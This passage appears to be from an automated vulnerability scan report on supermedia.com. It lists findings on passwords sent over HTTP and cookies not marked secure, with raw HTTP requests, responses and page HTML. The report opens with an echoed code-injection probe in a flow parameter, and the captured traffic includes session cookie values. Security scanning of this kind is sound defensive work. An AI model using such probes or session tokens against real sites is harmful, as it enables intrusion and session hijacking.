No such flow definition with id &#039;response.write(268409241-22)&#039;&#039; found; the flows available are: array&lt;String&gt;[&#039;accountAdmin-flow&#039;, &#039;accountreg-flow&#039;, &#039;businessprofile-flow&#039;, &#039;client-consolidation-flow&#039;, &#039;contactus-flow&#039;, &#039;coupon-flow&#039;, &#039;forgotpassword-edit-flow&#039;, &#039;funding-flow&#039;, &#039;lead-maintain-flow&#039;, &#039;listingOrderSummary-flow&#039;, &#039;login-flow&#039;, &#039;loginact-flow&#039;, &#039;maintaincreditcard-flow&#039;, &#039;microsite-flow&#039;, &#039;myaccount-contactinfo-edit-flow&#039;, &#039;myaccount-domains-flow&#039;, &#039;myaccount-email-edit-flow&#039;, &#039;myaccount-emails-flow&#039;, &#039;myaccount-flow&#039;, &#039;myaccount-password-edit-flow&#039;, &#039;myaccount-websites-flow&#039;, &#039;onlinecc-flow&#039;, &#039;ordersummary-flow&#039;, &#039;paypercall-flow&#039;, &#039;pfc-businessprofile-flow&#039;, &#039;pfc-flow&#039;, &#039;pfp-adDesign-flow&#039;, &#039;pfp-categories-flow&#039;, &#039;pfp-elp-flow&#039;, &#039;pfp-geo-flow&#039;, &#039;pfp-keywords-flow&#039;, &#039;photos-flow&#039;, &#039;ppc-advsearch-flow&#039;, &#039;ppc-bidding-flow&#039;, &#039;ppc-create-flow&#039;, &#039;ppc-fullservice-flow&#039;, &#039;ppc-maintain-flow&#039;, &#039;repmanagement-flow&#039;, &#039;reviews-flow&#039;, &#039;sclicks-maintain-flow&#039;, &#039;sharethewealth-flow&#039;, &#039;temporary-password-flow&#039;, &#039;webhosting-addons-flow&#039;, &#039;webhosting-design-flow&#039;, &#039;webhosting-domainnames-flow&#039;, &#039;webhosting-email-products-flow&#039;, &#039;webhosting-websites-flow&#039;]
</div>

</div>
</div>
<div >

<!-- Footer Start -->

<!-- DROP DOWN START -->
<div id="dropDownShadow" ></div>
<div id="dropDownHolder" class="dropDownNavHolder">
</div>
<div class="nodisplay">
<div class="dropdown-content" id="online-advertising-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/business-listings/listing-enhancements-packages">Click packages</a></li>
<li><a href="https://www.supermedia.com/local-search-marketing/do-it-yourself">Do-it-yourself search marketing</a></li>
<li><a href="https://www.supermedia.com/local-search-marketing/services">Search marketing services</a></li>
<li><a href="https://www.supermedia.com/video-ads">Video ads</a></li>
<li><a href="https://www.supermedia.com/business-listings">Business listings</a></li>
<li><a href="https://www.supermedia.com/reputation-monitoring">Reputation monitoring</a></li>
<li><a href="https://www.supermedia.com/business-listings/coupons">Coupons</a></li>
</ul>
</div>

<div class="dropdown-content" id="print-advertising-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/print-advertising/yellow-pages">Yellow pages</a></li>
<li><a href="https://www.supermedia.com/print-advertising/white-pages">White pages</a></li>
<li><a href="https://www.supermedia.com/directory-options">Directory options</a></li>
</ul>
</div>

<div class="dropdown-content" id="direct-mail-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/direct-mail/postcards">Postcards</a></li>
<li><a href="https://www.supermedia.com/direct-mail/shared-card-packs">Shared card packs</a></li>
<li><a href="https://www.supermedia.com/direct-mail/call-tracking">Call tracking</a></li>
<li><a href="https://www.supermedia.com/direct-mail/compare-direct-mail-options">Compare options</a></li>
</ul>
</div>

<div class="dropdown-content" id="web-site-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/web-design">Web site design</a></li>
<li><a href="https://www.supermedia.com/web-hosting">Web site hosting</a></li>
<li><a href="https://www.supermedia.com/domain-names">Domain names</a></li>
<li><a href="https://www.supermedia.com/business-email">Business email</a></li>
</ul>
</div>

<div class="dropdown-content" id="packaged-solutions-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/packaged-solutions/multi-product-packages">Multi-product packages</a></li>
<li><a href="https://www.supermedia.com/packaged-solutions/business-profile-packages">Business profile packages</a></li>
<li><a href="https://www.supermedia.com/packaged-solutions/auto-dealer-packages">Auto dealer packages</a></li>
</ul>
</div>
</div>
<script type="text/javascript">
function addDropDownShadow(){
var IMAGEWIDTH=220,IMAGEHEIGHT=260,SHADOWSIZE=10;
var contentWidth = $("#dropDownHolder").width();
var contentHeight= $("#dropDownHolder").height();
var contentPos= $("#dropDownHolder").offset();

//set shadow position
$("#dropDownShadow").css("top",contentPos.top);
$("#dropDownShadow").css("left",contentPos.left-SHADOWSIZE);

//now add image aligned at bottom
var imgStyle=' style="position:relative;left:0px;top:'+(contentHeight+SHADOWSIZE-IMAGEHEIGHT)+'" ';
var imgHTML= '<img src="https://www.supermedia.com/img/img-spportal/supermedia/backgrounds/dropdown-shadow-fixed-width.png" '+imgStyle+' />';
//alert(imgHTML);
$("#dropDownShadow").css("height",contentHeight+SHADOWSIZE);
$("#dropDownShadow").html(imgHTML);
$("#dropDownShadow").show();
}
var dropDownTimerHandle;
function clearDropDownTimer(){
if(dropDownTimerHandle!=0){
clearTimeout(dropDownTimerHandle);
}
dropDownTimerHandle= 0;
}
function setDropDownTimer(){
dropDownTimerHandle= setTimeout(function(){
$("#dropDownHolder").hide();
$("#dropDownShadow").hide();
},1000);
}
$(document).ready(function(){
$("#globalnav-list li a").each(function(){
if(document.getElementById($(this).attr("id")+'-dropdown-content')){
$(this).mouseover(function(){
clearDropDownTimer();
var pos= $(this).offset();
$("#dropDownHolder").css("left",pos.left+1);
$("#dropDownHolder").css("top",pos.top+35);
var dropDownSel= '#'+$(this).attr("id")+'-dropdown-content';
$("#dropDownHolder").html($(dropDownSel).html());
$("#dropDownHolder").show();
addDropDownShadow();
});
$(this).mouseout(function(){
setDropDownTimer();
});
}
});
$("#dropDownHolder a").mouseover(function(){
clearDropDownTimer();
});
$("#dropDownHolder").mouseout(function(){
clearDropDownTimer();
setDropDownTimer();
});
$("#dropDownHolder").mouseover..
Password Transmitted Over HTTP

1 TOTAL
IMPORTANT
CONFIRMED
1
Netsparker identified that password data is sent over HTTP.

Impact

If an attacker can intercept network traffic, he/she can steal users' credentials.

Actions to Take

  1. See the remedy for the solution.
  2. Move all of your critical forms and pages to HTTPS and do not serve them over HTTP.

Remedy

All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input starting from the login process should only be served over HTTPS.
- /spportal/

/spportal/ CONFIRMED

http://www.supermedia.com/spportal/

Form target action

http://www.supermedia.com/spportal/forgotPwd.do

Request

GET /spportal/ HTTP/1.1
Referer: http://www.supermedia.com/spportal/spportalFlow.do?fromPage=login&_flowId=loginact-flow
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.supermedia.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Sat, 19 Mar 2011 11:57:02 GMT
Set-Cookie: JSESSIONID=6EE789CA7BB216AF3B210922AD30A088.app5-a1; Path=/,trafficSource=default; Expires=Mon, 18-Apr-2011 11:57:02 GMT; Path=/,CstrStatus=U; Expires=Mon, 18-Apr-2011 11:57:02 GMT; Path=/,NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139e45525d5f4f58455e445a4a423660;path=/;httponly
Content-Type: text/html;charset=UTF-8
Connection: close
Cache-Control: private
Content-Encoding:
Content-Length: 8349

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Small Business Marketing and Internet Advertising | SuperMedia.com</title>

<link type="text/css" rel="stylesheet" href="http://www.superpages.com/inc/social/soc.css" >
<link rel="stylesheet" type="text/css" href="http://www.supermedia.com/spportal/style/cobrand.css" >
<link rel="stylesheet" type="text/css" href="http://www.supermedia.com/spportal/style/supermedia/supermedia.css">
<script type="text/javascript" src="http://www.supermedia.com/spportal/js/jquery/jquery-1.3.2.min.js"></script>
<script type="text/javascript" src="http://www.supermedia.com/spportal/js/jquery/blockui.js"></script>
<script type="text/javascript" language="JavaScript" src="http://www.supermedia.com/spportal/js/cookies.js"></script>
<script type="text/javascript" language="JavaScript" src="http://www.supermedia.com/spportal/js/header.js"></script>

<meta name="decorator" content="supermedia">
<link rel="STYLESHEET" type="text/css" href="http://www.supermedia.com/spportal/style/supermedia/homepage.css">
<script type="text/javascript" src="http://www.supermedia.com/spportal/js/supermedia/homepage.js"></script>
<script type="text/javascript" src="js/remember.js"></script>

<META NAME="keywords" CONTENT="small business advertising, small business marketing, business advertising, business marketing, online marketing, online advertising, direct mail advertising, direct mail marketing, yellow pages advertising, yellow pages marketing">
<META NAME="description" CONTENT="Small business advertising and marketing provided by Super Media. Online and offline advertising services are available including pay per click, pay for calls, websites, yellow pages listings, direct mail listings and much more.">
<meta name="google-site-verification" content="xI_TN3NsQrUZhmtShUkzABGDmVdlqPgosij6bQzzlCY">


<META http-equiv=Content-Type content="text/html; charset=utf-8">
</head>
<body onload="gethpCookie();" onunload="">
<!-- specify omniture report suite for analytics -->
<!-- SiteCatalyst code version: H.1. Copyright 1997-2005 Omniture, Inc.More info available at http://www.omniture.com --><script type="text/javascript" language="javascript"> // use the appropriate account based on the server var s_account="Superpagesadvert";</script>
<!-- output omniture header -->
<!-- SiteCatalyst code version: H.14. Copyright 1997-2007 Omniture, Inc. More info available at http://www.omniture.com --><script type="text/javascript" language="JavaScript" src="/spportal/js/s_code.js"></script><script type="text/javascript" language="JavaScript"><!--/* You may give each page an identifying name, server, and channel onthe next lines. */s.channel="";s.pagetype="";s.server="";s.referrer="http://www.supermedia.com/spportal/spportalFlow.do?fromPage=login&_flowId=loginact-flow";s.pageName="";s.prop1="";s.prop2="";s.prop3="Not Logged in";s.prop4="";s.prop5="";s.prop6="";s.prop7="";s.prop8="";s.prop9="";s.prop10="";s.prop11="";s.prop12="";s.prop13="";s.prop14="";s.prop15="";s.prop16="";s.prop17="";s.prop18="";s.prop19="";s.prop20="";s.prop21="";s.prop22="";s.prop23="";s.prop24="";s.prop25="";s.prop26="";s.prop27="";s.prop28="";s.prop29="";s.prop30="";/* Conversion Variables */s.zip="";s.purchaseID="";s.state="";s.events="";s.campaign="";s.products="";s.eVar1="";s.eVar2="";s.eVar3="";s.eVar4="";s.eVar5="";s.eVar6="";s.eVar7="";s.eVar8="";s.eVar9="";s.eVar10="";s.eVar11="";s.eVar12="";s.eVar13="";s.eVar14="";s.eVar15="";s.eVar16="";s.eVar17="";s.eVar18="";s.eVar19="";s.eVar20="";s.eVar21="";s.eVar22="";s.eVar23="";s.eVar24="";s.eVar25="";s.eVar26="";s.eVar27="";s.eVar28="";s.eVar29="";s.eVar30="";--></script>
<!-- Test & Target tracking - added 10/01 -->
<script type="text/javascript" src="http://www.supermedia.com/spportal/js/mbox.js"></script>

<!-- Header Start -->

<!-- Javascript to capture buttons from the landing pages in omniture -->
<script language="javascript" type="text/JavaScript">

</script>
<!-- End of 'capture' omniture code -->
<!-- Code to find isSecurePage Start -->


<!-- Code to find isSecurePage End -->
<!-- Atlas Code Start -->



<script language="javascript" type="text/JavaScript">document.write('<s'+'cript language="JavaScript" src="http://view.atdmt.com/jaction/00asup_Retargeting_1"></s'+'cript>')</script><noscript><iframe src="http://view.atdmt.com/iaction/00asup_Retargeting_1" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" ></iframe></noscript>


<!-- Atlas Code End -->



<div id="header">
<div id="top">





<a href="http://www.supermedia.com" title="SuperMedia"><img alt="SuperMedia" src="http://www.supermedia.com/spportal/img-spportal/supermedia/banners/supermedia-logo.gif" width="173" height="55" border="0" class="title"/></a>



<div id="utility_nav">


<ul id="utility_nav-list">
<li><a href="http://www.supermedia.com/business-listings" title="Add/Edit A Free Listing">Add/Edit A Free Listing</a></li>
<li><a href="http://www.supermedia.com/about-us" title="About">About</a></li>
<li><a href="http://www.supermedia.com/help" class="utility" title="Support">Support</a></li>
<li>
<a href="http://www.supermedia.com/signin" title="Account Sign In"><b> Sign In</b></a>

</li>
</ul>


</div>



<div id="contactSalesDiv">
<!-- If not signed in show sales team info -->
<span id="customer-service-number">Order by phone&nbsp;(866) 311-4186</span>


</div>

<div id="globalnav">
<ul id="globalnav-list">



<li><a id="home" href="http://www.supermedia.com" title="Home">Home</a></li>
<li><a id="online-advertising" href="http://www.supermedia.com/online-advertising" title="Online Advertising">Online Advertising </a></li>
<li><a id="print-advertising" href="http://www.supermedia.com/print-advertising" title="Yellow Pages">Yellow Pages</a></li>
<li><a id="direct-mail" href="http://www.supermedia.com/direct-mail" title="Direct Mail">Direct Mail</a></li>
<li><a id="web-site" href="http://www.supermedia.com/web-sites" title="Web Sites">Web Sites</a></li>
<li><a id="packaged-solutions" href="http://www.supermedia.com/packaged-solutions" title="Packaged Solutions">Packaged Solutions</a></li>



</ul>
</div>
</div>
</div>

<!-- Roll-over navigation menus -->

<!-- Header End -->

<div id="content-shadow" >


<div id = "everything_inner">
<DIV class="main_image" title="let's grow your business - see how">
<IMG alt="Turn clicks into customers" title="Turn clicks into customers"
src="http://www.supermedia.com/spportal/cm/supermedia/homepage/image3/banner1.jpg">

<DIV class="desc">
<DIV class="bannerblock" id="display-block">
<a href="/business-listings/listing-enhancements-packages" onclick="var s=s_gi(s_account); s.linkTrackVars='prop21'; s.prop21='Homepg: Turn clicks'; s.tl(this,'o','Homepg: Turn clicks');" class="banner_link"></a>

<H2 class="new-black-header">Turn clicks into customers</H2>
<span class="new-black-subheader">Our click packages connect you to online shoppers.</span>
<br/><br/><br/><br/>
<div class="btn_big_orange"><span class = "btn_big_orange">SEE HOW &raquo;</span></div>
</DIV>
</DIV>
</DIV>


<DIV class="image_thumb">
<span class="left-arrow" onclick="previousBanner(ind)">
<IMG alt="left" src="http://www.supermedia.com/spportal/img-spportal/supermedia/banners/homepage/left-arrow.gif">
</span>

<UL>
<LI>
<A href="http://www.supermedia.com/spportal/cm/supermedia/homepage/image3/banner1.jpg" onclick="var s=s_gi(s_account); s.linkTrackEvents='prop21'; s.prop21='HP Page: '; ">
<IMG alt="Turn clicks into customers" src="http://www.supermedia.com/spportal/img-spportal/supermedia/banners/homepage/one.gif">
</A>

<DIV class="bannerblock">
<a href="/business-listings/listing-enhancements-packages" onclick="var s=s_gi(s_account); s.linkTrackVars='prop21'; s.prop21='Homepg: Turn clicks'; s.tl(this,'o','Homepg: Turn clicks');" class="banner_link"></a>

<H2 class="new-black-header">Turn clicks into customers</H2>
<span class="new-black-subheader">Our click packages connect you to online shoppers.</span>
<br/><br/><br/><br/>
<div class="btn_big_orange"><span class = "btn_big_orange">SEE HOW &raquo;</span></div>
</DIV>
</LI>
<LI>
<A href="http://www.supermedia.com/spportal/cm/supermedia/homepage/image4/banner2.jpg">
<IMG alt="Do you have any fans? - Reputation monitoring" src="http://www.supermedia.com/spportal/img-spportal/supermedia/banners/homepage/two.gif"></A>

<img src="http://www.supermedia.com/spportal/cm/supermedia/homepage/image4/banner2.jpg" alt="" class="preloadImg">
<DIV class="bannerblock">
<a href="/reputation-monitoring" onclick="var s=s_gi(s_account); s.linkTrackVars='prop21'; s.prop21='Homepg: Reputation monitoring'; s.tl(this,'o','Homepg: Reputation monitoring');" class="banner_link"></a>
<H2 class="new-white-header">Do you have any fans?</H2>
<span class="new-white-subheader">Find out what people are saying about your business<br>
with our free reputation monitoring tools.</span>
<br/><br/><br/><br/>
<div class="btn_big_orange"><span class = "btn_big_orange">LEARN MORE &raquo;</span></div>
</DIV>
</LI>
<LI>
<A href="http://www.supermedia.com/spportal/cm/supermedia/homepage/image5/banner3.jpg">
<IMG alt="Refer a friend" src="http://www.supermedia.com/spportal/img-spportal/supermedia/banners/homepage/three.gif">
</A>

<img src="http://www.supermedia.com/spportal/cm/supermedia/homepage/image5/banner3.jpg" alt="" class="preloadImg">
<DIV class="bannerblock">
<a href="/client-solutions/share-the-wealth" onclick="var s=s_gi(s_account); s.linkTrackVars='prop21'; s.prop21='Homepg: Share The Wealth'; s.tl(this,'o','Homepg: Share The Wealth');" class="banner_link"></a>

<H2 class="new-white-header">Refer a friend</H2>
<span class="new-white-subheader">Save money on your advertising spend with<br> our Share The Wealth Program.</span>
<br/><br/><br/><br/>
<div class="btn_big_orange"><span class = "btn_big_orange">SEE HOW &raquo;</span></div>
</DIV>
</LI>
<LI>
<A href="http://www.supermedia.com/spportal/cm/supermedia/homepage/image6/banner4.jpg">
<IMG alt="Connect with your customers" src="http://www.supermedia.com/spportal/img-spportal/supermedia/banners/homepage/four.gif">
</A>

<img src="http://www.supermedia.com/spportal/cm/supermedia/homepage/image6/banner4.jpg" alt="" class="preloadImg">
<DIV class="bannerblock">
<a href="/client-solutions" onclick="var s=s_gi(s_account); s.linkTrackVars='prop21'; s.prop21='Homepg: Connect with customers'; s.tl(this,'o','Homepg: Connect with customers');" class="banner_link"></a>

<H2 class="new-white-header">Connect with your customers</H2>
<span class="new-white-subheader">We have advertising options tailored to meet your needs.</span>
<br/><br/><br/><br/><br/><br/><br/>
<div class="btn_big_orange"><span class = "btn_big_orange">LEARN MORE &raquo;</span></div>
</DIV>
</LI>
</UL>

<span class="right-arrow" onclick="nextBanner(ind)">
<IMG alt="right" src="http://www.supermedia.com/spportal/img-spportal/supermedia/banners/homepage/right-arrow.gif">
</span>
<span class="divider">
<IMG alt="" src="http://www.supermedia.com/spportal/img-spportal/supermedia/banners/homepage/divider-line.gif">
</span>
<span class="pause" onclick="pauseBanner()">
<IMG alt="" src="http://www.supermedia.com/spportal/img-spportal/supermedia/banners/homepage/pause-button.gif">
</span>
</DIV>



<div id="sign-in-form">
<div class = "formbox">

<h3>Client Sign In</h3>
<form id="signinform" name="signin" onkeypress="headerSignIn(event, this, '/spportal/indexLogin.do;jsessionid=6EE789CA7BB216AF3B210922AD30A088.app5-a1')"
action="/spportal/indexLogin.do;jsessionid=6EE789CA7BB216AF3B210922AD30A088.app5-a1" method="POST">
<table>
<tr>
<td width="70px">
<label>Email or ID:</label>
<br>
</td>
<td nowrap>
<input type="text" name="username" class="textfield" id="email-address" />
</td>
</tr>
<td>
<label>Password:</label>
</td>
<td>
<input type="password" name="password" class="textfield" id="password" AUTOCOMPLETE = "off"/>
<span class="subtext"><a href="javascript:void(0);" onclick="$('#signinform').attr('action','http://www.supermedia.com/spportal/forgotPwd.do');$('#signinform').submit();" title="Forgot password?">Forgot password?</a></span>
<div class="btn_grey"><a onkeypress="return false" href="javascript:checkRememberme();" title="Sign in">Sign in</a></div>
</td>
</tr>
</table>
</form>
<span id="bottom-remember">
<input id="hp_remember_me" name="checkbox" type="checkbox" value="checkbox" >Remember me
<br></span>
<span id="bottom"><a href="http://www.supermedia.com/help/account-information/sign-in" title="SNew Clients">New Users</a> | <a ..
Cookie Not Marked As Secure

1 TOTAL
IMPORTANT
CONFIRMED
1
A cookie was transmitted over HTTPS but was not marked as secure. This means the cookie could potentially be stolen by an attacker who can successfully intercept and decrypt the traffic, or following a successful MITM (man-in-the-middle) attack.

Impact

This cookie will also be transmitted over plain HTTP connections; therefore, if this cookie is important (such as a session cookie), an attacker might intercept it and hijack a victim's session. If the attacker can carry out a MITM attack, he/she can force the victim to make an HTTP request in order to steal the cookie.

Actions to Take

  1. See the remedy for the solution.
  2. Mark all cookies used within the application as secure. (If the cookie is not related to authentication or does not carry any personal information, you do not have to mark it as secure.)

Remedy

Mark all cookies used within the application as secure.

Required Skills for Successful Exploitation

To exploit this issue, the attacker needs to be able to intercept traffic. This generally requires local access to the web server or to the victim's network. Attackers need to understand layer 2 and have physical access to systems that act as waypoints for the traffic, or have gained access to a system located between the victim and the web server.
- /spportal/

/spportal/ CONFIRMED

https://www.supermedia.com/spportal/

Identified Cookie

trafficSource

Request

GET /spportal/ HTTP/1.1
Referer: https://www.supermedia.com/spportal/spportalFlow.do?fromPage=login&_flowId=loginact-flow
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.supermedia.com
Cookie: JSESSIONID=D61798579F75CB8CC29455B745D6534F.app8-a1; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139f45525d5f4f58455e445a4a423660
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Sat, 19 Mar 2011 11:57:03 GMT
Set-Cookie: trafficSource=default; Expires=Mon, 18-Apr-2011 11:57:02 GMT; Path=/,CstrStatus=U; Expires=Mon, 18-Apr-2011 11:57:02 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Connection: close
Cache-Control: private
Content-Encoding:
Content-Length: 8324

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Small Business Marketing and Internet Advertising | SuperMedia.com</title>

<link type="text/css" rel="stylesheet" href="http://www.superpages.com/inc/social/soc.css" >
<link rel="stylesheet" type="text/css" href="https://www.supermedia.com/spportal/style/cobrand.css" >
<link rel="stylesheet" type="text/css" href="https://www.supermedia.com/spportal/style/supermedia/supermedia.css">
<script type="text/javascript" src="https://www.supermedia.com/spportal/js/jquery/jquery-1.3.2.min.js"></script>
<script type="text/javascript" src="https://www.supermedia.com/spportal/js/jquery/blockui.js"></script>
<script type="text/javascript" language="JavaScript" src="https://www.supermedia.com/spportal/js/cookies.js"></script>
<script type="text/javascript" language="JavaScript" src="https://www.supermedia.com/spportal/js/header.js"></script>

<meta name="decorator" content="supermedia">
<link rel="STYLESHEET" type="text/css" href="https://www.supermedia.com/spportal/style/supermedia/homepage.css">
<script type="text/javascript" src="https://www.supermedia.com/spportal/js/supermedia/homepage.js"></script>
<script type="text/javascript" src="js/remember.js"></script>

<META NAME="keywords" CONTENT="small business advertising, small business marketing, business advertising, business marketing, online marketing, online advertising, direct mail advertising, direct mail marketing, yellow pages advertising, yellow pages marketing">
<META NAME="description" CONTENT="Small business advertising and marketing provided by Super Media. Online and offline advertising services are available including pay per click, pay for calls, websites, yellow pages listings, direct mail listings and much more.">
<meta name="google-site-verification" content="xI_TN3NsQrUZhmtShUkzABGDmVdlqPgosij6bQzzlCY">


<META http-equiv=Content-Type content="text/html; charset=utf-8">
</head>
<body onload="gethpCookie();" onunload="">
<!-- specify omniture report suite for analytics -->
<!-- SiteCatalyst code version: H.1. Copyright 1997-2005 Omniture, Inc.More info available at http://www.omniture.com --><script type="text/javascript" language="javascript"> // use the appropriate account based on the server var s_account="Superpagesadvert";</script>
<!-- output omniture header -->
<!-- SiteCatalyst code version: H.14. Copyright 1997-2007 Omniture, Inc. More info available at http://www.omniture.com --><script type="text/javascript" language="JavaScript" src="/spportal/js/s_code.js"></script><script type="text/javascript" language="JavaScript"><!--/* You may give each page an identifying name, server, and channel onthe next lines. */s.channel="";s.pagetype="";s.server="";s.referrer="https://www.supermedia.com/spportal/spportalFlow.do?fromPage=login&_flowId=loginact-flow";s.pageName="";s.prop1="";s.prop2="";s.prop3="Not Logged in";s.prop4="";s.prop5="";s.prop6="";s.prop7="";s.prop8="";s.prop9="";s.prop10="";s.prop11="";s.prop12="";s.prop13="";s.prop14="";s.prop15="";s.prop16="";s.prop17="";s.prop18="";s.prop19="";s.prop20="";s.prop21="";s.prop22="";s.prop23="";s.prop24="";s.prop25="";s.prop26="";s.prop27="";s.prop28="";s.prop29="";s.prop30="";/* Conversion Variables */s.zip="";s.purchaseID="";s.state="";s.events="";s.campaign="";s.products="";s.eVar1="";s.eVar2="";s.eVar3="";s.eVar4="";s.eVar5="";s.eVar6="";s.eVar7="";s.eVar8="";s.eVar9="";s.eVar10="";s.eVar11="";s.eVar12="";s.eVar13="";s.eVar14="";s.eVar15="";s.eVar16="";s.eVar17="";s.eVar18="";s.eVar19="";s.eVar20="";s.eVar21="";s.eVar22="";s.eVar23="";s.eVar24="";s.eVar25="";s.eVar26="";s.eVar27="";s.eVar28="";s.eVar29="";s.eVar30="";--></script>
<!-- Test & Target tracking - added 10/01 -->
<script type="text/javascript" src="https://www.supermedia.com/spportal/js/mbox.js"></script>

<!-- Header Start -->

<!-- Javascript to capture buttons from the landing pages in omniture -->
<script language="javascript" type="text/JavaScript">

</script>
<!-- End of 'capture' omniture code -->
<!-- Code to find isSecurePage Start -->


<!-- Code to find isSecurePage End -->
<!-- Atlas Code Start -->


<script language="javascript" type="text/JavaScript">document.write('<s'+'cript language="JavaScript" src="https://view.atdmt.com/jaction/00asup_RetargetingSecure_1"></s'+'cript>')</script><noscript><iframe src="https://view.atdmt.com/iaction/00asup_RetargetingSecure_1" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" ></iframe></noscript>



<!-- Atlas Code End -->



<div id="header">
<div id="top">





<a href="https://www.supermedia.com" title="SuperMedia"><img alt="SuperMedia" src="https://www.supermedia.com/spportal/img-spportal/supermedia/banners/supermedia-logo.gif" width="173" height="55" border="0" class="title"/></a>



<div id="utility_nav">


<ul id="utility_nav-list">
<li><a href="https://www.supermedia.com/business-listings" title="Add/Edit A Free Listing">Add/Edit A Free Listing</a></li>
<li><a href="https://www.supermedia.com/about-us" title="About">About</a></li>
<li><a href="https://www.supermedia.com/help" class="utility" title="Support">Support</a></li>
<li>
<a href="https://www.supermedia.com/signin" title="Account Sign In"><b> Sign In</b></a>

</li>
</ul>


</div>



<div id="contactSalesDiv">
<!-- If not signed in show sales team info -->
<span id="customer-service-number">Order by phone&nbsp;(866) 311-4186</span>


</div>

<div id="globalnav">
<ul id="globalnav-list">



<li><a id="home" href="https://www.supermedia.com" title="Home">Home</a></li>
<li><a id="online-advertising" href="https://www.supermedia.com/online-advertising" title="Online Advertising">Online Advertising </a></li>
<li><a id="print-advertising" href="https://www.supermedia.com/print-advertising" title="Yellow Pages">Yellow Pages</a></li>
<li><a id="direct-mail" href="https://www.supermedia.com/direct-mail" title="Direct Mail">Direct Mail</a></li>
<li><a id="web-site" href="https://www.supermedia.com/web-sites" title="Web Sites">Web Sites</a></li>
<li><a id="packaged-solutions" href="https://www.supermedia.com/packaged-solutions" title="Packaged Solutions">Packaged Solutions</a></li>



</ul>
</div>
</div>
</div>

<!-- Roll-over navigation menus -->

<!-- Header End -->

<div id="content-shadow" >


<div id = "everything_inner">
<DIV class="main_image" title="let's grow your business - see how">
<IMG alt="Turn clicks into customers" title="Turn clicks into customers"
src="https://www.supermedia.com/spportal/cm/supermedia/homepage/image3/banner1.jpg">

<DIV class="desc">
<DIV class="bannerblock" id="display-block">
<a href="/business-listings/listing-enhancements-packages" onclick="var s=s_gi(s_account); s.linkTrackVars='prop21'; s.prop21='Homepg: Turn clicks'; s.tl(this,'o','Homepg: Turn clicks');" class="banner_link"></a>

<H2 class="new-black-header">Turn clicks into customers</H2>
<span class="new-black-subheader">Our click packages connect you to online shoppers.</span>
<br/><br/><br/><br/>
<div class="btn_big_orange"><span class = "btn_big_orange">SEE HOW &raquo;</span></div>
</DIV>
</DIV>
</DIV>


<DIV class="image_thumb">
<span class="left-arrow" onclick="previousBanner(ind)">
<IMG alt="left" src="https://www.supermedia.com/spportal/img-spportal/supermedia/banners/homepage/left-arrow.gif">
</span>

<UL>
<LI>
<A href="https://www.supermedia.com/spportal/cm/supermedia/homepage/image3/banner1.jpg" onclick="var s=s_gi(s_account); s.linkTrackEvents='prop21'; s.prop21='HP Page: '; ">
<IMG alt="Turn clicks into customers" src="https://www.supermedia.com/spportal/img-spportal/supermedia/banners/homepage/one.gif">
</A>

<DIV class="bannerblock">
<a href="/business-listings/listing-enhancements-packages" onclick="var s=s_gi(s_account); s.linkTrackVars='prop21'; s.prop21='Homepg: Turn clicks'; s.tl(this,'o','Homepg: Turn clicks');" class="banner_link"></a>

<H2 class="new-black-header">Turn clicks into customers</H2>
<span class="new-black-subheader">Our click packages connect you to online shoppers.</span>
<br/><br/><br/><br/>
<div class="btn_big_orange"><span class = "btn_big_orange">SEE HOW &raquo;</span></div>
</DIV>
</LI>
<LI>
<A href="https://www.supermedia.com/spportal/cm/supermedia/homepage/image4/banner2.jpg">
<IMG alt="Do you have any fans? - Reputation monitoring" src="https://www.supermedia.com/spportal/img-spportal/supermedia/banners/homepage/two.gif"></A>

<img src="https://www.supermedia.com/spportal/cm/supermedia/homepage/image4/banner2.jpg" alt="" class="preloadImg">
<DIV class="bannerblock">
<a href="/reputation-monitoring" onclick="var s=s_gi(s_account); s.linkTrackVars='prop21'; s.prop21='Homepg: Reputation monitoring'; s.tl(this,'o','Homepg: Reputation monitoring');" class="banner_link"></a>
<H2 class="new-white-header">Do you have any fans?</H2>
<span class="new-white-subheader">Find out what people are saying about your business<br>
with our free reputation monitoring tools.</span>
<br/><br/><br/><br/>
<div class="btn_big_orange"><span class = "btn_big_orange">LEARN MORE &raquo;</span></div>
</DIV>
</LI>
<LI>
<A href="https://www.supermedia.com/spportal/cm/supermedia/homepage/image5/banner3.jpg">
<IMG alt="Refer a friend" src="https://www.supermedia.com/spportal/img-spportal/supermedia/banners/homepage/three.gif">
</A>

<img src="https://www.supermedia.com/spportal/cm/supermedia/homepage/image5/banner3.jpg" alt="" class="preloadImg">
<DIV class="bannerblock">
<a href="/client-solutions/share-the-wealth" onclick="var s=s_gi(s_account); s.linkTrackVars='prop21'; s.prop21='Homepg: Share The Wealth'; s.tl(this,'o','Homepg: Share The Wealth');" class="banner_link"></a>

<H2 class="new-white-header">Refer a friend</H2>
<span class="new-white-subheader">Save money on your advertising spend with<br> our Share The Wealth Program.</span>
<br/><br/><br/><br/>
<div class="btn_big_orange"><span class = "btn_big_orange">SEE HOW &raquo;</span></div>
</DIV>
</LI>
<LI>
<A href="https://www.supermedia.com/spportal/cm/supermedia/homepage/image6/banner4.jpg">
<IMG alt="Connect with your customers" src="https://www.supermedia.com/spportal/img-spportal/supermedia/banners/homepage/four.gif">
</A>

